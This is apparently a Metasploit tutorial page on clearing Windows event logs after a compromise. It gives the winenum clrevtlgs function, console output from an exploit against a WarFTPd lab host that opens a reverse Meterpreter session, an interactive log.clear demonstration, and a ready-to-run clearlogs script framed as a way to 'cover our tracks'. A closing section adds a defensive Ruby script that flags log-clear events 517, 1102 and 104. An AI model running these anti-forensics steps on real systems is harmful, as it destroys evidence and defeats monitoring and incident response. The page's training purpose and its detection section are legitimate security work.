Metasploit Event Log Management

Sometimes it is best not to leave a record of your activity. Whatever the reason, you may find yourself needing to clear the Windows event logs. Looking at the source of the winenum script located in 'scripts/meterpreter', we can see how this function works.

def clrevtlgs()
    # Event logs handled by winenum; each is opened through the
    # Meterpreter stdapi eventlog API and emptied in turn.
    evtlogs = [
        'security',
        'system',
        'application',
        'directory service',
        'dns server',
        'file replication service'
    ]
    print_status("Clearing Event Logs, this will leave an event 517")
    begin
        evtlogs.each do |evl|
            print_status("\tClearing the #{evl} Event Log")
            log = @client.sys.eventlog.open(evl)
            log.clear
            # winenum keeps a local report file; note the action there
            file_local_write(@dest,"Cleared the #{evl} Event Log")
        end
        print_status("All Event Logs have been cleared")
    rescue ::Exception => e
        print_status("Error clearing Event Log: #{e.class} #{e}")
    end
end


Let's look at a scenario where we need to clear the event logs, but instead of using a prefabricated script to do the work for us, we will use the Ruby interpreter inside Meterpreter to clear them on the fly. First, let's look at our Windows 'System' event log.

Windows 'System' Event Log


Now, let's exploit the system and clear the log manually. We will mimic the commands from the winenum script. Running 'log = client.sys.eventlog.open('system')' opens the System log for us.

msf exploit(warftpd_165_user) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Connecting to FTP server 172.16.104.145:21...
[*] Connected to target FTP server.
[*] Trying target Windows 2000 SP0-SP4 English...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 2 opened (172.16.104.130:4444 -> 172.16.104.145:1246)

meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client
>> log = client.sys.eventlog.open('system')
=> #<...>   (the interpreter echoes a very long object dump here; omitted)


Now we will see whether we can clear the log by running 'log.clear'.

>> log.clear
=> #<...>   (the same lengthy object dump is echoed again; omitted)


Let's see if it worked.

Windows 'System' Event Log


Success! We can now take this a step further and write our own script for clearing event logs.

# Clears Windows Event Logs

evtlogs = [
    'security',
    'system',
    'application',
    'directory service',
    'dns server',
    'file replication service'
]
print_line("Clearing Event Logs, this will leave an event 517")
evtlogs.each do |evl|
    print_status("Clearing the #{evl} Event Log")
    log = client.sys.eventlog.open(evl)
    log.clear
end
print_line("All Clear! You are a Ninja!")


After writing our script, we place it in /usr/share/metasploit-framework/scripts/meterpreter/. Then, let's re-exploit the system and see if it works.

msf exploit(warftpd_165_user) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Connecting to FTP server 172.16.104.145:21...
[*] Connected to target FTP server.
[*] Trying target Windows 2000 SP0-SP4 English...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (172.16.104.130:4444 -> 172.16.104.145:1253)

meterpreter > run clearlogs
Clearing Event Logs, this will leave an event 517
[*] Clearing the security Event Log
[*] Clearing the system Event Log
[*] Clearing the application Event Log
[*] Clearing the directory service Event Log
[*] Clearing the dns server Event Log
[*] Clearing the file replication service Event Log
All Clear! You are a Ninja!
meterpreter > exit

The only event left in the System log is the expected 517.

Windows 'System' Event Log


This is the power of Meterpreter. Without much background beyond some sample code taken from another script, we created a useful tool to help us cover our tracks.
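From the defender's side, the trace the page points out is the useful part: clearing a log is itself logged, and the event 517 left behind is exactly what a monitoring pipeline should alert on. The Ruby script below is an added example, not code from this page or from the Metasploit project. It parses a constructed CSV export of event records (the column layout and every sample value are assumptions made for this example) and returns an alert for each log-cleared event. Besides the 517 shown on the page, it also recognises 1102 and 104, the identifiers that Windows Vista and later write for a cleared Security log and a cleared System log.

```ruby
# Added example (not from the page or the Metasploit project): flag
# "event log cleared" records in an exported set of Windows events.
# Clearing a log leaves its own record: 517 on Windows 2000/2003 (as shown
# on the page), 1102 (Security) and 104 (System) on Vista and later.
require 'time'

CLEAR_EVENTS = {
  517  => 'Security log cleared (Windows 2000/2003)',
  1102 => 'Security log cleared (Vista and later)',
  104  => 'System log cleared (Vista and later)'
}.freeze

# Constructed sample export, one record per line:
# "timestamp,log,event_id,user,message" (layout assumed for this example).
SAMPLE_EXPORT = <<~CSV
  2018-06-02T10:50:01Z,System,7036,SYSTEM,The Print Spooler service entered the running state.
  2018-06-02T10:55:12Z,Security,528,alice,Successful Logon
  2018-06-02T10:57:17Z,Security,517,alice,The audit log was cleared
  2018-06-02T10:57:18Z,System,104,alice,The System log file was cleared.
  2018-06-02T10:58:00Z,System,7036,SYSTEM,The Workstation service entered the running state.
CSV

Record = Struct.new(:time, :log, :event_id, :user, :message)

# Parse one CSV line; the message is the fifth field and may itself
# contain commas, so the split is limited to five parts.
def parse_record(line)
  ts, log, id, user, message = line.strip.split(',', 5)
  Record.new(Time.iso8601(ts), log, Integer(id), user, message)
end

# Return one alert hash per log-cleared event, in export order.
def find_log_clears(export)
  export.lines.map { |l| parse_record(l) }.each_with_object([]) do |r, alerts|
    desc = CLEAR_EVENTS[r.event_id]
    next unless desc
    alerts << { time: r.time, log: r.log, event_id: r.event_id,
                user: r.user, reason: desc }
  end
end

# Count clears per account: a single account clearing several logs within
# seconds (as the page's script does) stands out far more than one event.
def clears_by_user(export)
  find_log_clears(export).group_by { |a| a[:user] }.transform_values(&:size)
end

if $PROGRAM_NAME == __FILE__
  find_log_clears(SAMPLE_EXPORT).each do |a|
    puts "#{a[:time].utc.iso8601} #{a[:log]} #{a[:event_id]} by #{a[:user]}: #{a[:reason]}"
  end
  clears_by_user(SAMPLE_EXPORT).each { |user, n| puts "#{user}: #{n} log(s) cleared" }
end
```

Run against a real export, the two events at 10:57 in the sample are the signal to act on; on hosts that forward events to a central collector, the records that preceded the clear also survive there even though they are gone from the host, which is the main reason forwarding defeats this technique.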

Published: 2018-06-02 10:57:17  Category: Metasploit
Last updated: 2018-06-02 10:57:17
付杰